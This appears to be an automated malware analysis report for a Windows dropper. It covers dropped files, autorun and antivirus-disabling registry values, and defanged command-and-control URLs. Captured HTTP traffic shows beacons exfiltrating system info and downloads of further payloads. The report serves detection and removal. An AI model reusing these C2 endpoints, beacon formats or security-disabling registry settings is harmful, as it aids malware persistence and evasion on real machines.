Susp_Dropper (Kaspersky), Gen:Variant.Symmi.22722 (B) (Emsisoft), Gen:Variant.Symmi.22722 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 4840427168a9965e4dd57695f4eb5f34
SHA1: 0ef4dfd6895938be97f42886e003869bb777c5fd
SHA256: 8645d5705505416572d9393acca274f5d6332a3636621489d2f44ed92b290203
SSDeep: 12288:9qq56aNzthKz69e1NDxNlq99NcMWf8uqlTn8lZQTgqjFsHi0:9dppbKz6WNkLUeJ8lZQT5
Size: 847360 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: PCPerformer
Created at: 2014-04-16 00:27:00
Analyzed on: WindowsXP SP3 32-bit
Summary: Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Malware creates the following process(es):
win32plot2.exe:1396
jrhwdmjgu925ubg.exe:1776
jrhwdmjgu925ubg.exe:3876
jrhwdmjgunjvubg.exe:2660
%original file name%.exe:1144
unzip.exe:3760
ckxjtyt.exe:1964
ckxjtyt.exe:2836
jrhwdmjgszdmubgkotiny.exe:2128
jrhwdmjgt1byubg.exe:2588
jrhwdmjgubkfubg.exe:3640
pogwoihcz.exe:3524
pogwoihcz.exe:2856
The Malware injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process jrhwdmjgunjvubg.exe:2660 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\tst (10 bytes)
The process %original file name%.exe:1144 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (3920 bytes)
%System%\bzntcdorshxs\tst (10 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (0 bytes)
The process unzip.exe:3760 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\binaries_burst4\win32\win32plot2.exe (673 bytes)
%System%\binaries_burst4\win64\win64burst2.exe (673 bytes)
%System%\binaries_burst4\win32\win32burst2.exe (673 bytes)
%System%\binaries_burst4\win64\win64plot2.exe (673 bytes)
The process ckxjtyt.exe:1964 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\tst (10 bytes)
The process ckxjtyt.exe:2836 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\binaries_burst4.zip (10700 bytes)
%System%\bzntcdorshxs\run (10 bytes)
%System%\bzntcdorshxs\rng (44 bytes)
%System%\unzip.exe (7100 bytes)
%System%\bzntcdorshxs\cfg (494 bytes)
%System%\pogwoihcz.exe (5873 bytes)
%WinDir%\Temp\jrhwdmjgu925ubg.exe (35 bytes)
%System%\bzntcdorshxs\tst (10 bytes)
%WinDir%\Temp\jrhwdmjgt1byubg.exe (35 bytes)
%WinDir%\Temp\jrhwdmjgubkfubg.exe (2820 bytes)
%WinDir%\Temp\jrhwdmjgunjvubg.exe (5873 bytes)
The Malware deletes the following file(s):
%WinDir%\Temp\jrhwdmjgt1byubg.exe (0 bytes)
%WinDir%\Temp\jrhwdmjgubkfubg.exe (0 bytes)
%WinDir%\Temp\jrhwdmjgu925ubg.exe (0 bytes)
The process jrhwdmjgszdmubgkotiny.exe:2128 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\etc (10 bytes)
%System%\ckxjtyt.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\bzntcdorshxs\tst (10 bytes)
The Malware deletes the following file(s):
%System%\drivers\etc\hosts (0 bytes)
The process pogwoihcz.exe:3524 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\tst (10 bytes)
The process pogwoihcz.exe:2856 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\tst (10 bytes)
Registry activity
The process win32plot2.exe:1396 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
The process jrhwdmjgu925ubg.exe:1776 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 9C E5 B6 99 02 49 CB AA D2 50 26 B3 C6 6D 3C"
The process jrhwdmjgu925ubg.exe:3876 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 52 33 C4 75 6A 43 E9 D7 74 60 B9 62 2B 23 A5"
The process jrhwdmjgunjvubg.exe:2660 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 B9 84 BF D5 1C C7 54 8E 5E 10 DE 9E 4E 24 BD"
The process unzip.exe:3760 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 E4 47 D5 42 0D 90 00 56 5C 12 74 E1 87 85 4D"
The process ckxjtyt.exe:2836 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 6C AC 11 85 8F BF D5 2A 15 20 D5 32 A8 01 49"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The process jrhwdmjgszdmubgkotiny.exe:2128 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 73 E8 5C DA 03 01 7E 41 DC 1A E3 19 87 2B 55"
To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AutoConnect Engine WebClient Web Procedure Trap" = "%System%\ckxjtyt.exe"
The process jrhwdmjgt1byubg.exe:2588 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 8A 05 E4 23 AA 61 68 83 D8 98 CE C4 59 87 C7"
The process jrhwdmjgubkfubg.exe:3640 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
Dropped PE files
MD5 | File path |
---|---|
476f447617f65eebf35c52d4fd3b3188 | c:\WINDOWS\Temp\jrhwdmjgu925ubg.exe |
fecf803f7d84d4cfa81277298574d6e6 | c:\WINDOWS\system32\unzip.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
win32plot2.exe:1396
jrhwdmjgu925ubg.exe:1776
jrhwdmjgu925ubg.exe:3876
jrhwdmjgunjvubg.exe:2660
%original file name%.exe:1144
unzip.exe:3760
ckxjtyt.exe:1964
ckxjtyt.exe:2836
jrhwdmjgszdmubgkotiny.exe:2128
jrhwdmjgt1byubg.exe:2588
jrhwdmjgubkfubg.exe:3640
pogwoihcz.exe:3524
pogwoihcz.exe:2856 - Delete the original Malware file.
- Delete or disinfect the following files created/modified by the Malware:
%System%\bzntcdorshxs\tst (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (3920 bytes)
%System%\binaries_burst4\win32\win32plot2.exe (673 bytes)
%System%\binaries_burst4\win64\win64burst2.exe (673 bytes)
%System%\binaries_burst4\win32\win32burst2.exe (673 bytes)
%System%\binaries_burst4\win64\win64plot2.exe (673 bytes)
%System%\binaries_burst4.zip (10700 bytes)
%System%\bzntcdorshxs\run (10 bytes)
%System%\bzntcdorshxs\rng (44 bytes)
%System%\unzip.exe (7100 bytes)
%System%\bzntcdorshxs\cfg (494 bytes)
%System%\pogwoihcz.exe (5873 bytes)
%WinDir%\Temp\jrhwdmjgu925ubg.exe (35 bytes)
%WinDir%\Temp\jrhwdmjgt1byubg.exe (35 bytes)
%WinDir%\Temp\jrhwdmjgubkfubg.exe (2820 bytes)
%WinDir%\Temp\jrhwdmjgunjvubg.exe (5873 bytes)
%System%\bzntcdorshxs\etc (10 bytes)
%System%\ckxjtyt.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AutoConnect Engine WebClient Web Procedure Trap" = "%System%\ckxjtyt.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 667158 | 667648 | 4.71459 | 0d37ea21d46fd457efcdcbc414af23e6 |
.rdata | 671744 | 53434 | 53760 | 3.65008 | ebfa7ac2aa75c0bd35892129695abd28 |
.data | 729088 | 158844 | 124928 | 5.50119 | 16d3baf792c669359cc24b48d18a27cd |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://melbourneit.hotkeysparking.com/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | |
hxxp://requireneither.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 208.91.197.241 |
hxxp://decemberknew.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 98.139.135.198 |
hxxp://decemberknew.net/forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://www.geobytes.com/IpLocator.htm | 69.16.219.22 |
hxxp://decemberknew.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E5620 @ 2.40GHz (2400 MHz)&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://decemberknew.net/forum/search.php?method=setvar&key=connected&value=8083&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://decemberknew.net/dep/unzip.exe | 98.139.135.198 |
hxxp://decemberknew.net/dep/binaries_burst4.zip | 98.139.135.198 |
hxxp://throughcountry.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 208.91.197.241 |
hxxp://gentlefriend.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 208.91.197.241 |
hxxp://picturebecome.net/dep/binaries_burst4.zip | 98.139.135.198 |
hxxp://rememberpaint.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 208.91.197.241 |
hxxp://mightglossary.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 8.5.1.16 |
hxxp://picturebecome.net/dep/unzip.exe | 98.139.135.198 |
hxxp://glasshealth.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 208.91.197.241 |
www.showmyip.com | 212.117.175.194 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: rememberpaint.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2607
Keep-Alive: timeout=5, max=126
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://rememberpaint.net/?fp=1DRuJgDNJXkEVD5%2FiGni9v3toTy0wy2ebXlOhRNOtS5Udxlo0ID4PfPk5WN9s2E3tmehVOgDmzNCPKCXAdTI%2BQ==&prvtof=0G4hRm1xnmN71Auaziei4xYFwShH7oid2z0uKbb7hLo=&poru=JAEITCvT3ATSD95YCokaigCHAqcD57pq+k9Ssvb0G8WAxKobtn7HH3tsEsDhrrE1c9awH7YyTzET3nczMf6YUm/o067AT7oDEfv6njBn/HKsugTFg7xvoMY3V/nJNwQf&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://rememberpaint.net/?fp=1DRuJgDNJXkEVD5/iGni9v3toTy0wy2ebXlOhRNOtS5Udxlo0ID4PfPk5WN9s2E3tmehVOgDmzNCPKCXAdTI+Q==&prvtof=IT1nchMsaM0WXpFNgClhp0C+LPKdVwt2V3XT7a%2BsH1A=&poru=k4WuWLM/Nm3RxM1tSPdirQmbJGlibMJcKTIY8iBqlXnLr7dZfDXjfNzlDhmJd2PPlSK2W7FCLoHuF8GGSuzFF31sq8y0t92TOXSAtdSLEqfH6J1f4j11GEMW
<<< skipped >>>
GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E5620 @ 2.40GHz (2400 MHz)&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:04 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
.............
GET /forum/search.php?method=setvar&key=connected&value=8083&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:05 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
.............
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:03 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
304....U......(.decemberknew.net..........5......o..fFi..8.....b..&.).h.7..i..ng?H..........f..Ht.BH..<M..$.L..l..Z0........W*....... >@..;BY..hs ....f..,..uO@...*.N....J.........\.P.p_..OXP....&.t.Z.w....`..I=!n....W..~W..T.b..!..#._..lD.*...`.K..O......l.....Y...[.%..>/...W..9..?.X...=....B..?..b. .......4...053..............g..p.........!;..#....(.p..K3.;.Z......:-..D...........)......K$xy&.:b:ge......V.ACV.LC...X?&...#..|#)h.v=..6...N..Z.Lvz...,r-.?o.......W.:.h.....X..A..DB8.z. ...r ....(B...S.} ..S..aZ.>.."...V.....d...J.....*p..H /.R].....8<........]}....!.vf,.=...0h..b.o.<.D..{.....-y....N.......Z..I.Cd..K.Q.@..Tr.._-.Nr...}R...d....i...Vb..*..=.......1......n.M.o....?{.(..*.......L.3.../Y.....t...["0.....z....G.Z...I6....o..~..........u.a).k.. #u..,k.j0t..ah.JLsg..h...........}|.N..5`..O.<.(.".;.k.q...b..X..g.0...>...f...Nl.N.jU|.n...f...Js..0{p3..3.%..NlZp..>.*.p(...{I.~.APTnE.!.r4...3 ..]K.Y?....G-...*..K5L....n]...W...p..'&...._.iE[./L..1.b.:.!..*i..C)....L...IJ&k..#O.......p...;...(b..0/...T.lm(9.I....\\\..$_......E....k'...!..B....C..........Bc...{....Q?./OJ.jRd..{....j.`..].W...t...2....../5%......#[.g..WT.M}.9..y...t...GFF.!:.TA.o.*..X.<.`.]...._.....9..,4UQ..-...tA.N*"..P.....l......(N6<~..r...<T[_V(.-..J.M....&v..
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: gentlefriend.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:10 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2599
Keep-Alive: timeout=5, max=123
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://gentlefriend.net/?fp=3nB+Gww8ttmsWXm0BY1EdeTmO3Ulz67JmvcOUDVf4eYrovlWueybau49NakK4xLYrEVUQbqJcKdH0CbuvXfg5g==&prvtof=zhRgz1xuFRpHFAgLQv0feYD/DBX/Ng1JO565gWSBtZI=&poru=N8dRHeffnczSYRX4s7t//tDxbrorndTL1Hfxni3GMu9SpXTX7COifFNjVMvoIw4JEkRMkseCQXQwNz+8QJdhKj05mguiYHfqhLUf4gHPRqAn5eRP5v5DJ9GOnHJH/IEo&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://gentlefriend.net/?fp=3nB+Gww8ttmsWXm0BY1EdeTmO3Ulz67JmvcOUDVf4eYrovlWueybau49NakK4xLYrEVUQbqJcKdH0CbuvXfg5g==&prvtof=XtjO2X71dZ5T2BDPJWLoPT7k8Mx5PXGAeq+J3jPNgxU=&poru=h2VspZVYRcX61rDfjpvXg4PszgFGhY31jvEvToI6myr+/qWzpARQ4n%2By1Rdv0gzizQizReBV4w5LK2vhGfE840xM/AjnZx7n5lEVhUfW2/InmjHAedL0
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: requireneither.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:10 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2601
Keep-Alive: timeout=5, max=111
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://requireneither.net/?fp=axCPzesR7uBwtTqOnmcl9F6GeD2ZopDbYpEVkJd07DDm0lAUyJuIxlLRzzCEJlVCjx6s55CadqZFeRomVEAErQ==&prvtof=DtovJQCpYRpf99MUWzBwaQI1fo6mS7UMSgVgFRORcFY=&poru=J1gFiuzz+h8I6C8md3nr6FsCHGohqf81OdafFArL0i+6O4BDZQB/pReR4mHRPRCqKx%2F7vBiRKyRlbQQLuJArpae1V3+ZgdHNLZLXnd1iVcCyXACaJj1xabfHGLFvaMdn&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://requireneither.net/?fp=axCPzesR7uBwtTqOnmcl9F6GeD2ZopDbYpEVkJd07DDm0lAUyJuIxlLRzzCEJlVCjx6s55CadqZFeRomVEAErQ==&prvtof=cIgUFdj0K5P8mVSR9AkhcEl2A4Gj/iGY9C53s3q4RCI%3D&poru=xZkbqYo/emU/zwMkcAtPW1mOH0T7Sx4x3sXsGyevMKJglGwvtrb99Xv7WbO3UfbrO8u/YApPSNIVR6oacHv69g+9JRMagR37GsZAjICaculwljRRugrFlsR5
<<< skipped >>>
relayrqst
ID
..
GET /dep/unzip.exe HTTP/1.0
Accept: */*
Connection: close
Host: picturebecome.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:05 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 20 May 2014 22:57:37 GMT
Accept-Ranges: bytes
Content-Length: 164864
Content-Type: application/octet-stream
Age: 0
Server: ATS/5.0.1
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......B...............8.Z...................p....@...............3........................... ......................................................................................................................................................text...$X.......Z..................`..`.data........p.......^..............@....bss.....................................idata...............`..............@....rsrc................t..............@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.......$........C..h.....1.]...U.......$........C..H.....1.]...U......U...$..d.C...]..v...'....U......U...$..H.C...]..v...'....U..S..$..$..@..}O.......C....$.pB.....B..M..E......L$..T$..U..T$..D$..pB...K....qB...t^..qB...<.C...t..D$..Z...$..K....<.C....t....qB..\$..J0..$..K....<.C....t....qB..\$..JP..$.{K...fK.....qB.....C...4K.....pB......pB...$.\$..L$..........J....$..N....&....U......]..M.1..u.1.....=..........=....sg=....t....u..]...]....D$.......$......J.....t"..t...$......&......'...........
<<< skipped >>>
GET /dep/binaries_burst4.zip HTTP/1.0
Accept: */*
Connection: close
Host: picturebecome.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:06 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 06 Mar 2015 17:25:24 GMT
Accept-Ranges: bytes
Content-Length: 321783
Content-Type: application/zip
Age: 0
Server: ATS/5.0.1
PK..........fF................binaries_burst4/..1 ...~2...PK..............PK..........fF................binaries_burst4/win64/..1 ...~2...PK..............PK........p.fFTn..JD......$...binaries_burst4/win64/win64plot2.exe..1 ...~2...Z../....?|].ex.z#a.k.}o}.#<\_..2%....(..~.....n`.|b.....M..w..v...;...5......;...f6!..^r.TRTu ...S4..F.#.h!J...z.....@..@.-y.7..)..D..C.}......8..-$..-.wy..{'....Wh.....e~hK....Wu.9odo.G...O......f...e{.....|A....c......Q..6.i*...dJ$.3.o.8....,.....#_.........lg.p..p*h.D-..%9?.Gf...........8...?..=c.l'..1.K...C.V.......B..I{.....aG..55O{.$!..,...........Y~..............X.00Jxc.................z.%.(:M...R.....7......1..v~j.......`,@...wj.....)..J....4..T...%D....z.....w.AP*!.....{....a.NE=.h.....C.......!..wC....R..lQX.L.G....o4......'.t7QYOE.x{..y&..{....?y.....@F.3......Y-.L.MV.-..=.....J}.KHK.lG..(........P ..=.a...>.p!DR..u.. ....GD.E.sY....1..D...d.T.....=.t.."c..P....L..Z.h.k..U..<5.`..D.Rv..w.A{.`?r............ ..&...*U-.....u.Z~...1..U...X. .@M..,...x../^B...^@.QyV.....X.-a.gc..A.Z)P$h.%........S.:.%n.2.]...7T....g..o.s'.^.]O.W..c..17.e...:.........2IH>\Y..j........M<.,\...I.'.S..j\....%.B'x......0...]Go..2/....._m.D...G~...5.....Z ..!,&...<.3}..U?..{1..E%?...@..L>....e<.X....Y=...,."..e~.....Rx.]..[.{..[.*..<.7....J...U.._......`.... .bK..I..Bc.....@k......-.....(.........SF..jv.....q.Q7....3.%.......T......-a..Pwon..y.^..u..'..8.,.....h....n...ylj ..R.=.....|.......U....t.*..K.J0........g...1Z.Q.........R..Mh.'......F......`=.....e.....mn-.2`z.k9'.
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: glasshealth.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:11 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2611
Keep-Alive: timeout=5, max=127
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://glasshealth.net/?fp=gflAhs8IcUd97NIiayKQ7UQN9dlG4+w1rhgSgPDY2wI1o/jF3QTSUXEUvYwZaD8eIVaYzJQ4Lnkr85gq8zHv%2Fg==&prvtof=67h3zsyWRM96HzMguVIw2NdqJ+sg0xsg33t5I9z/LVc=&poru=9L/nBj7txLcevEXVP1cCHBo4ptAm7czfS3iC3M3yaXiYxFUyvUodJ4XBJUStdjN4JAxtw9qGwHb1c7suSo4arypf1Xv3S/4Ku9T0pQXvVchj6kR5kdiaxr8TXn5KM2Mx&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://glasshealth.net/?fp=gflAhs8IcUd97NIiayKQ7UQN9dlG4+w1rhgSgPDY2wI1o/jF3QTSUXEUvYwZaD8eIVaYzJQ4Lnkr85gq8zHv/g==&prvtof=n+scX8txUIS8AicO8bYmmTai1kexrb2ax5CYJ+aQ0SU=&poru=ZfmI6g7Ocz4B2/kwYdn7QBUrOzmbBFIsa/tBlE9Umk/T+gLSwOcUOeOU9JeEHoQOHHVqq7emploCdGlO4+Bejn8FmEfbIk4NvkonDzLYANLGP0zR
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: mightglossary.net
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 7849
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
p3p: CP="CAO PSA OUR"
Set-Cookie: SessionID=1671ce8f-86e8-4303-a81c-b7e9e64fca1e; path=/
